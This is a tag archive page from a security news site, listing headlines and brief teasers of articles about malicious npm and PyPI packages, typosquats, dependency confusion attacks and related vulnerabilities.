This Week in Malware, highlights include an influx of hundreds of dependency confusion packages with diverse targets and a ‘python-dateutils’ PyPI package that attempts to typosquat the vastly known Python module, dateutil.
The post This Week in …
Tag: npm
Europe, Global Security News, North America, Vulnerabilities
This Week in Malware: killing Windows Defender with an npm package
by Ax Sharma •
This Week in Malware, highlights include malicious npm package ‘flame-vali’ that claims to let developers “bypass any request proxys.” But that’s not quite the case. And, some more dependency confusion packages caught by us.
The post This Week in…
Europe, Global Security News, North America, Vulnerabilities
npm package disables Windows Defender before dropping trojan
by Ax Sharma •
Last week, Sonatype’s automated malware detection systems flagged npm package ‘flame-vali’ that claims to let developers “bypass any request proxys.” But that’s not quite the case.
The post npm package disables Windows Defender before dropping tr…
Europe, Global Security News, North America, Vulnerabilities
This Week in Malware—npm malware exfiltrates Windows SAM, Amazon EC2 credentials
by Ax Sharma •
This Week in Malware, we continue to see an uptick in outright malicious and dependency confusion packages employing novel tactics. A list of some of the packages caught by Sonatype’s automated malware detection systems is given below and more an…
Europe, Global Security News, North America, Vulnerabilities
This Week in Malware—Malicious Rust crate, ‘colors’ typosquats
by Ax Sharma •
This Week in Malware digest was delayed by a day in light of a significant announcement on Friday from Sonatype’s CTO Brian Fox. The announcement details Sonatype’s participation in an ongoing conversation led by the Open Source Security Foundati…
Europe, Global Security News, North America, Vulnerabilities
Malicious npm ‘colors’ typosquats pack Discord malware
by Ax Sharma •
Sonatype has caught newer typosquats of the popular ‘colors’ npm library that contain obfuscated malware. The malware in question comprises Discord info-stealers attempting to hijack the user’s Discord tokens and session information.
The post Mal…
Malware Indicators (IoCs), Vulnerabilities
An npm Registry Bug Allowed Adding Random Maintainers To Malicious Packages
by Abeerah Hashim •
Researchers have discovered a severe vulnerability in the npm registry that could harm developers. Exploiting…
An npm Registry Bug Allowed Adding Random Maintainers To Malicious Packages on Latest Hacking News.
Europe, Global Security News, North America, Vulnerabilities
Fixing a vulnerability? Make sure your GitHub isn’t showing too much
by Ax Sharma •
obfuscated secrets and a $326M crypto hack: are your GitHub commits revealing too much?
When committing software projects to GitHub it remains crucial to ensure that secrets like your private tokens, API keys, and passwords are not accidentally c…
Europe, Global Security News, North America, Vulnerabilities
This week in malware—a ‘fix-crash’ info-stealer and 500+ malicious npm packages
by Ax Sharma •
This week in malware, Sonatype’s automated malware detection systems caught upwards of 300 npm packages, including 86 named after popular NodeJS functions.
The post This week in malware—a ‘fix-crash’ info-stealer and 500+ malicious np…
Europe, Global Security News, North America, Vulnerabilities
86 Malicious npm Packages Named After Popular NodeJS Functions
by Ax Sharma •
Sonatype’s automated malware detection bots have caught 86 npm packages that are named after popular NodeJS and JavaScript functions.
The post 86 Malicious npm Packages Named After Popular NodeJS Functions appeared first on Security Boulevard.
Malware Indicators (IoCs), Vulnerabilities
Critical Remote Code Execution Vulnerability Found In Parse Server
by Abeerah Hashim •
Researchers have discoverd a critical-severity bug in the opensource tool Parse Server. Exploiting this server…
Critical Remote Code Execution Vulnerability Found In Parse Server on Latest Hacking News.
Europe, Global Security News, North America, Vulnerabilities
Remember npm library ‘colors’? There’s no such thing as ‘colors-2.0’
by Ax Sharma •
The popular npm package, ‘colors’ made headlines earlier this year when its dev Marak Squires had sabotaged the component by adding an infinite loop to it, printing zalgo text incessantly for everyone using the dependency.
The post Remember npm l…
Europe, Global Security News, North America, Vulnerabilities
Cyberattacks Related to JavaScript NPM Rise Sharply
by Nathan Eddy •
There has been a sharp rise in malicious activity found in npm, the most popular JavaScript package manager used by developers worldwide, with more than 1,300 malicious npm packages discovered for use in supply chain attacks, cryptojacking, data theft…
Europe, Global Security News, North America, Vulnerabilities
New Year, New CVE: a Deep Dive into the ‘node-forge’ (CVE-2022-0122)
by Juan Aguirre •
With over 16 Million weekly downloads, the important and widely-used “node-forge” component on npm implements key security functions, including Transport Layer Security protocol, cryptographic functions, and development tools for web apps in nati…
Europe, Global Security News, North America
‘Faker’ npm Library Gets New Home After Dev Throws in the Towel
by Ax Sharma •
Approx read time: 2.5 mins
The post ‘Faker’ npm Library Gets New Home After Dev Throws in the Towel appeared first on Security Boulevard.
Security Vendor News
S3 Ep65: Supply chain conniption, NetUSB hole, Honda flashback, FTC muscle [Podcast + Transcript]
by Paul Ducklin •
Latest episode -listen to it or read it now!
Security Vendor News
JavaScript developer destroys own projects in supply chain “lesson”
by Paul Ducklin •
Two popular open source JavaScript packages recently got “hacked” in a symbolic gesture by the original project creator.
Europe, Global Security News, North America
Evolving Threat series — Infiltrating NPM’s Supply Chain (UA-Parser-js)
by Chetan Conikee •
Evolving Threat series — Infiltrating NPM’s Supply Chain (UA-Parser-js)
And if you think your are safe (as you recently procured a well marketed commercial open source dependency scanner) is when you are most in danger as all such tools lack intellige…
Security Vendor News
Poisoned proxy PACs! The NPM package with a network-wide security hole…
by Paul Ducklin •
3,000,000 downloads a week… if only they’d read the fastidious manual!